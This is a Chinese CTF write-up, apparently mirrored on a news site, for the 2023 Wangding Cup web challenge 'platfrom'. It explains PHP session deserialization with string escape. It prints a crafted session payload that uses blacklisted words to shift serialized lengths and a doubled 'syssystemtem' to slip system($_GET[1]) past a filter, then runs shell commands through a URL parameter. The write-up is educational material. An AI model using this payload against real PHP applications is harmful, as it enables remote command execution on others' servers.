当前位置: 首页 > news >正文

2023-网鼎杯web-platfrom

platfrom

大佬wp

https://blog.xmcve.com/2024/11/04/%E5%BC%BA%E7%BD%91%E6%9D%AF2024-Writeup/#title-8

https://blog.yemaster.cn/post/123#go-ax-header-4

这题的考点是session反序列化以及字符逃逸

session反序列化学习

https://arsenetang.github.io/2021/08/31/反序列化篇之session反序列化/

session反序列化首先需要有session_id的控制权,就是能修改该值,

而后存在反序列化漏洞,也就是可以用链子执行危险函数,或者说打印flag,

然后触发服务端session的读取,就是有session所在的页面,读取到我们存入的pop链,其会自动进行反序列化,然后就会触发我们的链子,链子这里就不构造了


接着是字符逃逸,借用大佬的笔记

在session_id的文件中我们的链子大概是这样

user|s:56:"我们输入的用户名";session_key|s:20:"随机生成的key";password|s:98:"这里是我们输入的密码";

我们希望session读取的是

user|s:56:"随便";session_key|s:20:"随机生成的key";password|s:98:"我们的链子";

那怎么实现呢,需要注意的是,源代码这里有黑名单会将危险函数替换成空,其中就有eval,system

大佬的链子

user|s:56:"execevalexecevalexecevalexecevalexecexecexecevalexeceval";session_key|s:20:"12345678901234567890";password|s:98:";session_key|O:15:"notouchitsclass":1:{s:4:"data";s:17:"syssystemtem($_GET[1]);";}password|s:1:"a";

其中user的那一串 'execevalexecevalexecevalexecevalexecexecexecevalexeceval' 由黑名单函数组成的字符会被替换为空,而该字符的长度也不是随便的,而是精心计算的,替换为空后,56的字符长度依旧执行吞掉后面的56个字符,

";session_key|s:20:"12345678901234567890";password|s:98:

这里就成了无效的字符

替换后变成

user|s:56:"";session_key|s:20:"12345678901234567890";password|s:98:";session_key|O:15:"notouchitsclass":1:{s:4:"data";s:17:"system($_GET[1]);";}password|s:1:"a";

注意: 这里的双写是绕过黑名单,被黑名单置换为空后就是正常的格式

然后在维持该session的页面传参1=ls就行了

http://www.hskmm.com/?act=detail&tid=29341

相关文章:

  • 区分iBatis与MyBatis:两个Java数据库框架的比较
  • 2025大棕拉链厂家权威推荐榜:品质工艺与创新设计深度解析
  • JavaScript加密与解密技术:Hook技术应用案例分析
  • Oracle数据库创建表空间和索引的SQL语法示例
  • NOIP2016普及组port
  • 从增长焦虑到经营确定性:巨益OMS业财一体化的实践路径
  • 数据结构-双向链表
  • Alexa对话式AI技术进展全解析
  • AI小说生成器:智能创作与一致性维护的全流程解决方案
  • 2025无锡考编培训机构权威推荐榜:专业辅导与高通过率口碑之
  • 数据结构-单向循环链表
  • 论人工智能,对人类生产的影响。
  • 2025高频超声波检测设备厂家权威推荐榜:精准检测与技术创新
  • HEU KMS Activator最新功能使用教程及介绍,附HEU KMS Activator最新版下载
  • PWN手的成长之路-14-ciscn_2019_c_1-ret2libc
  • 国内高速下载镜像
  • 2025数控高速滚齿机厂家权威推荐榜:精密加工与高效产能标杆
  • 完整教程:prompt提示词工程---如何让大模型更听得懂人话
  • 2025年10月广州 1688 代运营服务商推荐,阿里巴巴1688店铺代运营、全店托管代运营公司推荐!
  • 2025拉伸器厂家最新权威推荐榜:技术实力与市场口碑深度解析
  • 2025年10月工作服厂家最新推荐排行榜,春夏秋冬季工作服,工人工作服,车间工作服,防静电工作服公司推荐!
  • 2023-网鼎杯web-thinkshop
  • 2025活性氧化镁厂家最新权威推荐榜:高纯度与稳定性能深度解
  • Java的一些细节
  • 2025年CNC高压清洗机厂家权威推荐:高效清洁与耐用性能深
  • 从 EFI 到 GPT:深入理解现代计算机启动与磁盘分区技能
  • 2025年扁钢厂家最新权威推荐榜:强度与精度双重保障的工业脊
  • GJB 438C学习
  • typora markdown
  • 2025防爆数粒机厂家权威推荐榜:高效精准与安全防爆口碑之选